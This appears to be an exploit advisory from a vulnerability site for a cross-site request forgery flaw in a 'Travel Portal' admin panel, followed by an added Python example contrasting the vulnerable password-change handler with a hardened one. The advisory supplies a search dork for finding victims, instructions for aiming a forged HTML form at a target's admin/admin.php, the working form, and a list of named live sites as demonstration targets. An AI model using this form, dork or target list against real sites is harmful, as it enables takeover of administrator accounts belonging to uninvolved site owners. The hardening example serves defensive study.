Travel Portal - Remote Admin Password Change CSRF

2017.01.17
OmidKiller (IR)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

+++++++++++++++++++++++++++++++++++++++
# Exploit Title: Travel Portal - Remote Admin Password Change ( CSRF )
# Author : OmidKiller
# Dork : inurl:admin/admin.php intext:Travel Portal
# Tested On: Kali Linux / Ubuntu Linux / Firefox
# Date: 16/1/2017
+++++++++++++++++++++++++++++++++++++++
# PoC :
1. Search the dork and open a random target.
2. In the code below, edit <form method="post" action="http://target.com/admin/admin.php"> so that the action points at the target's admin/admin.php, then use the form to change the password ;)
   Ex : <form method="post" action="http://www.sphider.eu/admin/admin.php">
   The password-change handler checks only the session cookie, which the browser attaches to the cross-site POST automatically, so the page only has to be opened (or submitted) by an administrator who is logged in to the target in the same browser.
+++++++++++++++++++++++++++++++++++++++
# Code :
<html>
<head>
<title>Exploit By OmidKiller</title>
</head>
<body>
<h3>Travel Portal - Remote Admin Password Change</h3>
<!-- admin_id=1 is the first administrator account; the handler takes it from the form -->
<form method="post" action="http://target.com/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<table>
<tr>
<td align="right">Admin Name:</td><td align="left">admin</td>
</tr>
<tr>
<td align="right">New Password:</td><td align="left"><input type="password" name="password" size="40" maxlength="40"></td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</tr>
</table>
</form>
</body>
</html>
+++++++++++++++++++++++++++++++++++++++
# Demo
[+] http://www.adia.info/stat/admin/admin.php
[+] http://www.sphider.eu/admin/admin.php
[+] http://ruebennest.de/planetstat/admin/admin.php
[+] http://intern.orthopaedics.or.at/kalender/admin/admin.php
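The advisory shows the attack but not the defect or its fix. The following is an added example, not code from the advisory or from the Travel Portal application: a minimal Python model of an admin/admin.php password-change handler, first as the advisory implies it behaves (any POST carrying a valid session cookie and the admin_id/password/submit fields is honoured, so the forged form above succeeds) and then hardened with a per-session synchronizer token, an Origin/Referer check, and no trust in the form-supplied admin_id. The request and session objects, the cookie name PHPSESSID, the site origin http://target.com and the attacker origin are all assumptions made for illustration.

```python
"""Added example: vulnerable vs. hardened admin password-change handler.

Not the application's real code; the request shape, session store and
origins are illustrative assumptions.
"""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

SITE_ORIGIN = "http://target.com"  # assumed: the placeholder origin from the advisory


@dataclass
class Request:
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)


@dataclass
class Session:
    admin_id: int
    csrf_secret: str = field(default_factory=lambda: secrets.token_hex(32))


SESSIONS: dict = {}            # session id -> Session
ADMIN_PASSWORDS: dict = {1: "original"}  # admin_id -> password (constructed sample data)


def login(admin_id: int) -> str:
    """Create a session and return its id (what the PHPSESSID cookie would hold)."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = Session(admin_id=admin_id)
    return sid


def csrf_token(sid: str) -> str:
    """Synchronizer token bound to the session; the real form embeds it as a hidden field.
    An attacker's page cannot read it cross-origin, so a forged form cannot supply it."""
    secret = SESSIONS[sid].csrf_secret.encode()
    return hmac.new(secret, b"update_password", hashlib.sha256).hexdigest()


def vulnerable_update_password(req: Request) -> bool:
    """Mirrors the flaw: the only check is the session cookie, which the browser
    attaches to a cross-site POST automatically, and admin_id comes from the form."""
    sess = SESSIONS.get(req.cookies.get("PHPSESSID", ""))
    if sess is None or "submit" not in req.form:
        return False
    ADMIN_PASSWORDS[int(req.form["admin_id"])] = req.form["password"]
    return True


def hardened_update_password(req: Request) -> bool:
    """Same handler with the three checks a CSRF-safe version needs."""
    sid = req.cookies.get("PHPSESSID", "")
    sess = SESSIONS.get(sid)
    if sess is None or "submit" not in req.form:
        return False
    # 1. Synchronizer token, compared in constant time.
    if not hmac.compare_digest(req.form.get("csrf_token", ""), csrf_token(sid)):
        return False
    # 2. Origin (or Referer as a fallback) must be our own site. Browsers send
    #    Origin on cross-site POSTs; a request with neither header is rejected here,
    #    which is the conservative choice for a state-changing admin action.
    source = req.headers.get("Origin") or req.headers.get("Referer", "")
    parsed = urlparse(source)
    if f"{parsed.scheme}://{parsed.netloc}" != SITE_ORIGIN:
        return False
    # 3. Act on the logged-in administrator, never on an admin_id taken from the form.
    ADMIN_PASSWORDS[sess.admin_id] = req.form["password"]
    return True


def forged_request(sid: str) -> Request:
    """The advisory's form as the victim's browser would submit it from the attacker's page."""
    return Request(
        cookies={"PHPSESSID": sid},
        form={"admin_id": "1", "password": "pwned", "submit": "Update Password"},
        headers={"Origin": "http://attacker.example"},  # assumed attacker origin
    )


def legitimate_request(sid: str, new_password: str) -> Request:
    """A genuine submission from the real admin page, carrying the token."""
    return Request(
        cookies={"PHPSESSID": sid},
        form={"admin_id": "1", "password": new_password, "submit": "Update Password",
              "csrf_token": csrf_token(sid)},
        headers={"Origin": SITE_ORIGIN},
    )


def demo() -> tuple:
    """Returns (forged-vs-vulnerable, forged-vs-hardened, legit-vs-hardened)."""
    sid = login(1)
    return (
        vulnerable_update_password(forged_request(sid)),
        hardened_update_password(forged_request(sid)),
        hardened_update_password(legitimate_request(sid, "new-secret")),
    )


if __name__ == "__main__":
    print(demo())
```

Running demo() gives (True, False, True): the forged form changes the password through the vulnerable handler, is rejected by the hardened one, and a real submission carrying the token still works. Marking the session cookie SameSite=Lax or Strict is a further layer, but the token check is what makes the handler safe regardless of browser defaults.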


Copyright 2024, cxsecurity.com